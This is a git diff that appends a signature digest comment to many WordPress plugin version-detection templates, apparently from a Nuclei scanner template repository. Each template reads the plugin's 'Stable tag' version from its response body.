--git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index 00e95c4263..a164c5431f 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202eab4f6afb9490f66e61f4577959be441cb69e83729b8f8baedbdfa013341448022100cf91a939bed4c5bfe5989c78dae45c2faedc0fa52d7bee368116817f6c6fa912:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index 212b2b13c4..8d5796ffc5 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d4b8fdffb5caa42dbceb59a680e1103e58eaff3c693cf16f05780242d40af8c30220642c0f133ad22f84d2478547f0b82c3cba93d7d240a177a6f34dc00611b6fc86:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index 6318392c5c..efeb6fec1b 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022067789da1b92b738b66b84666b0c9e56ff30df348ad6b9832394e8122abb39e33022068489cda11d7bee8536d9054e9f6b8499a9579ca80d82c005fbca43e5e58861e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index f3aae5f624..c9b9b3a646 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022033a27dbbabaadfe7ff72de50055afae36a553fbeb8d11d669a1cb9e3b22bed6c022100fd9bdef3add36dbc86df1ada94d76e25e308d93c9387c28537c16fe424d9f39e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index 23614882a7..de5365ca2b 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d9671e305cce97a774de0a4b497768605e43ee05cdcb580cbe28edb11d7ead31022100e232d045f36953a0a7f5a23bd59061d4ed2bf225259d80ff91a8c38fa4cc1ba0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index 85965337cb..4f9698539f 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022015258f7181bb68342ee1c074e39e817d8d6de2791b11db586da35e8d5f4b3d99022100e33c638bba745fce67adb9d7930eddd4ff322eaea1ef15591636886e83948bf9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 33d903a1b4..c6638714b6 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207ecea0361a9d986e5a95f3ae8a56ddae4c2324f76813a325eff1a792524d9b04022100a0a54a4dc154fbf9116a800fd7205aa6ce9545b031ff9d0218f222308c9a65c7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 3c6f8f287b..870571446c 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220488fd632bfcbd7d7d50065e48f6e3f2c0cbe4a62a93a4a3df51b34210b6ae2ea02200411c4cd5e15b4a6236633a9df26d7b97036bbf87647490aaf377c952935e6e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index c3b630cde2..6efe7db559 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220518f035850ca543735b4e8797b9ae69f2b70e9ba8c432ade3c5746b920e34df4022100e6b87a9907f670cbefca091034811314fbb9e97a79726ff420b204391090ea8e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index 5c8ce709b6..9528a029eb 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022008feb936d6422c1b20a90712247a8cb5f56c2ac1096f9096873ab98d57c6c94d02201ba4bc05658c9a3fe292d995036c388d724483f195931315abb42724567d4274:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index aea47b9e84..003e3ff7e7 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202e420ac21ace234b7b99f1a308dba84ae49eb3a9bb5cb2caecda5b6d22f404b1022024f92dd8d7bc7152e11808ab6d718c8acbe3705689851f124b501602874766e3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 78c584c388..2406bbccf2 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100932621fcca0890d21819d82ba4eb911388cccdbf837157bdd1919e9a3b9cad8f0221008199ed1043bff2c8462d31935ff0c9feebe7d8ae526b219a05d93e7fc305795d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index 2c80d09c27..43a813cf20 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220345261ff009a0daac374b249b6371605bca28b6b2deb50d02c02b48fcb81058f022100d8ade242077dd77da23df4358f717372470b75b412f6519d66ff0f0909c985ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 4b1b3a8754..af169498b8 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e4b15ad01b11e22ef54de12fe5fd26e72db23e2ad2ad2a912fb87d3a72783ca80221009f0e45bec3acb3fcf7c5299191465b35c9c5ef644bc9614740d9030b1fa797fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index 06ad83bdf7..1a425d64d9 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022031ec7feb63903ab7a0ee4d8b40617fa37765fcce06a2001a289a0d1cf9ec93500220397c72155438553e56fbf5eb28ede6bd0837c51f4503c1ad3f930c8cf124a382:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index b20666268f..2adaa14ea1 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100aa6516df2fe1fe5a120053d8d2c1682100b83a00182f46f5fa455b1c3dd5f22002207ecb51e2a5b5c17e92b44b38f9eab8cd5899d2081b1be0bcfa680d30857b7349:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index d94b4228a9..6f7ea673c0 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206c4176a7169f4d77412a3e403c9e8a228180ef681c5284c7f34bfd4995136cc0022002973c046508abd859db14034bf981df7bb802e1b4cab7efa3afaef771d98a69:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index c71fa258af..08da13fdcc 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d20bb0a5a67b1fc871927e94341ae7978dcfa5c7e646a688cfc99b65a357d528022036dade3914a556ab2bc69c0bf0080526a5a579dccc96c2f79ff898271a65a475:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index c2cd4ede1b..3ce72b2c49 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022012c59678fcca45c6cc22c23889171eab2c283d7ae46be598b7822bcb7301912302206c2517e2abc313b44f6e555438b6a5d28098c276c7a7c437a5674a3132b70a42:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index 03e6c13ec5..b3d0710d34 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206ec34348f5229ba50a3385f8de763e038c062c7b9894b0d765f3a30450dd38a30221008aa2572103d3891f38911f402b3fc736ab13c107736573a9e6b3ea7c68399991:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index cfac0b961b..a22e76e461 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e470cbda9568b0cca3811c39d6ae47be5fb07256b1a3d057a61835fb328f0bfe02207db5afc7ba7aaa50bde452f4bb95975ba723926d4d5645e27666103620fb869b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index 846761f2f7..edc13938bc 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100cb293b348b090f93b846ee4cc50a59789f706398e5ebd45964a26cfbb6a801140220611d755d2ef7ff95064cb7e0b9e5b64e5d5ba8224454b89f41ae6aa4e97d632d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index 0def6e61ca..bf88acafb0 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210092c1f07225569a1c14ae1c90c7a6ef80f2b4153a3712a1cf7d8660296b54dcb9022100df9981adb522f7f0753180c5d9e1d2f3a7f98f7eacd1562285065620dd0d0d8c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index 5c5decc127..cea63c9e36 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202f6a7c1dd3b4fcee7c98fb7969ccdb5c14c13db36838724e765b1b68174bde800220251bd646725588404d39804ea0245122c8395581fb3a25842d6a4571693d9fc1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index a8229a338e..a3fe008670 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022014b6e742e6ecdba5935e52121e01bd58d1cf01e7d05c52fafa3fac7a63a5ac3202202980b493a08e17961be0f351f49c4fdacbef82403632807edd3ec80dde0b1308:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index 6559e64dce..8441c8fa1a 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022007c35f31adaf71086ac251053e25a0e5e83d57ca382dc5899d7bd9c3c29d82f8022100fbc1e0d65fe346366ae0d4cda5232dee9e14718f5eda6d11488a7ba66adc1c4a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index a4368b8aa6..a89f893818 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207727eb4f9e0b9ad29fca15f0d522aa7afe902131b4055639e230a803a1561f81022100a474d9c8e4be7ae593292733c35cc6d48514493beb483298b553701007e79d3d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index d74de07e8e..85d4292b43 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ab1f89e6f35bf69b950e8b4c3439a2f0348043e05752bc60e283cbf8192d2599022100851f7e7927795bfa104caf39b5c7ec4cad0d72d7c3b87133a5c63a33acef1751:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index e5cfe47925..4d45cacd5e 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e07bc0a30d1ebff3917f2b8c83af1484a8c6ab16819afc26eb9d773cad814c86022031beff78fb9c7b620745c8a32430f532a5b3ec99ea532a428167b628d3a40375:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index fc44375947..255d54e5f2 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207f8a02dc992a2c45dc151bf5a13df5e0da0537c50b3e9bbd4d592872d5797857022075a788f2f64b1fb2e6de314ebea6c38d8e397b42b5a747b2b1a5b56209a1f163:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index a1616c1741..eb5873d150 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a0c3a3f33039e6e1e4258c0824eb2678df89cf50dfc0669724bac790c141303e022016dc7037d772ea20acdd4ec7887320bac173117a0ee46a1756ff802fec54b5bf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index 6cfb8bc272..e6dd3f440e 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f331775126ee5f7d2d2f20b7d058e4093becd686dc1dbc9279a7aa57c0151e9b0221009c9dfd31cff6b0b8b52e2053e7fccb5c8f38d5766bb4eebca9990550505c1ad6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index 9caaa53263..b6e9370962 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220412846260e088dacdf9103341fbf388c2b600facd97c7b5406a486425fc6522602200d74134ad2ae51443677658aea9ef7c49a9db0ad27f9a52278fb68c9fb01ea0e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 5e6b557952..fc400f571a 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220253d96119370a5c1a2cd5603d6bd9d1ae16aefceb7cfbc3ccf58e0ff9556d8c9022100dfc01aeb916cd8838227cba363576cf8ae68bc5154a699ea0a543c2211ea2e23:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index c5a665e6f7..853f29a056 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022028c73ed7769ea8b80a93f5474cc528906bd0e853dbc8f465f9a1f19c1c77e7530221008a8d9165b4e7f0bde65b71c88134b73eafe9aae7707c63b413cd4836ecaaff6e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index d86e0557ae..ab8a057bde 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ce62ab0626fe781189181180018157e932dd661a9333a4f7c294fd7a7624c01002204b7a61e97b7a04e7cff004e179e13c60a092f9d94967152001f413bd8da4e4d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index 4e20e57107..1cfafae6ef 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100eea0603da5d106cd71fd4ce0476f4fd920c88f24613a76cfba39d1575a0015920220748c67fa6bcf069464c14bc0fb8a6dada22252b50550d1cbc8161726e24087ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index 4ae34395fa..481765f2b1 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100acde90ee1e88e4e3c99fd96e9c42add90a331fd7b457645504b18dbb12c16510022100c2de4dcb47dcaf2ef6ed84bfecf533b68e611d2a3b02804d6215d3510cdc9273:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 2dd0ef57b5..de2d809fd5 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100fb6066264b8c92216d88ef35ba93b5fdecb257e90e494382a4bf1f7e606af05e022042f60fdb29e6f2e786caf295710bcfca3c022e857efb2fbd632bf77d7300b657:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index 11942f4fa4..1c184b9b3d 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c45635126f2a3d02f12184f25cb6e8c63ce366f8f81a72b1809da41c6076617302203196b534b0446868474984dd42c38cc49318c8615ec119f2b883b733ca119e08:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 87c2aeb4bd..c0a896585b 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220210a2b74503b0371850692209c3f88aab154f365f2ad0c147c6a3128775b38560220515534e0c862af60b5841db4b617bdba8b5d757be6284c47ef01e9f12636c8f7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index aa36122d85..4f7f87a964 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402205cb232383363732bb3f083957681f5c90a108da3628f65d2500912d633dd66fe0220766b82d4ea28038d2be91c3fb43beb28b2670c3196f18e7f710447e0a9333ab6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index 8bab0a9c3e..a2b5d194f2 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220198d02ca10ad9d3d7d5993a732251568a5788b96053ea14d6cf1fdc7f06a6e5802210081a86395693ca4bdd8c344433802d5d02f163ae00704a58fe86c3922d2760d5b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index affd270123..94e4dbd785 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402200a06395f054fb0f539d1f6ff1e9125f735f62133eb9e3e95dbd4c3b90c16e53d02200565f05d6eb3487d5afb5d0da3d82e93fc3455be20b3715970d78905d511685d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index 1d00a5705d..17f7535d09 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e8f74d782e034499e372d3543d3c86b33fca891c4d97199a13197cebdd853e8502201ed264721edd7775e738f06ffeefe5222293ec3b4744117f9b0484c8650ef8b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index 980265f531..9b6c225ce6 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022001e83287c30ceda0dad7760bdaff5707a29a737e70c7cc244e8c523d260c2ff1022100946558f2222156827487f330c8de5255145089f38b747b8a02604cc98825ebce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index daf205789d..dbeaa28d03 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204f4d547a67bf5f79393872c840e78ae5ab666ed34ad719f18bac3e763c4c110c022100cadd4069aadd887e9ffb9f2ec7a563be95c6cc2e5e114ec379b96177103f3bd8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git 